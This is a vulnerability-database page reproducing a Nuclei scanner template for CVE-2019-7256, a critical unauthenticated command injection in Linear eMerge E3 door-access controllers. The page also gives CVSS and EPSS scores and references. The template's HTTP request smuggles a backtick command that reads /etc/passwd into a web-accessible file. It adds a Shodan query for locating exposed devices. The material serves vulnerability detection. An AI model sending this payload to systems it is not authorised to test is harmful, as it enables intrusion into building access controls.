Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-7256
HistorySep 06, 2020 - 11:55 a.m.

eMerge E3 1.00-06 - Remote Code Execution

2020-09-0611:55:23
ProjectDiscovery
github.com
7

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.974 High

EPSS

Percentile

99.9%

Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.
id: CVE-2019-7256

info:
  name: eMerge E3 1.00-06 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patch or update to a non-vulnerable version of eMerge E3.
  reference:
    - https://www.exploit-db.com/exploits/47619
    - http://linear-solutions.com/nsc_family/e3-series/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7256
    - https://applied-risk.com/labs/advisories
    - https://www.applied-risk.com/resources/ar-2019-005
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2019-7256
    cwe-id: CWE-78
    epss-score: 0.97388
    epss-percentile: 0.99904
    cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nortekcontrol
    product: linear_emerge_essential_firmware
    shodan-query: title:"eMerge"
  tags: cve,cve2019,emerge,rce,edb,nortekcontrol
variables:
  file: "{{rand_text_alpha(10)}}"

http:
  - raw:
      - |
        GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /{{file}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b77a0864213b4fe4125f15f85ed5ed145ca4582c1d9f4dca5187290ea38c1bd3022100a85946a5da75421334d5fcaa5c821f33cdec52d34ea8b20f2d1bb7e8e0e70696:922c64590222798bb761d5b6d8e72950

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.974 High

EPSS

Percentile

99.9%